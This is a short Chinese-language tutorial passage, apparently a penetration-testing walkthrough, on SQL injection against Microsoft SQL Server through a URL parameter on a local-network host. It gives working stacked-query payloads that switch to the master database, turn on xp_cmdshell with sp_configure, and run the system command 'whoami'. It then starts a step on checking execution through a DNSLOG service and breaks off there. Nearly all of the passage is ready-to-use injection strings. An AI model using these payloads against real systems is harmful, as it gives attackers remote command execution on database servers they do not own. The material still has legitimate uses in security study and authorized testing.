一、首先要进入master,这里要用;隔开,有点类似堆叠查询
输入:http://192.168.1.106/1.php?id=1;use master;可看到没什么变化
二、开启高级功能
输入:http://192.168.1.106/1.php?id=1;use master;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;可看到这几句话正常执行
三、执行系统命令
输入:?id=1;use master;exec master..xp_cmdshell "whoami";
四、检测命令是否执行成功,可用DNSLOG在线测试
1.获取一个网址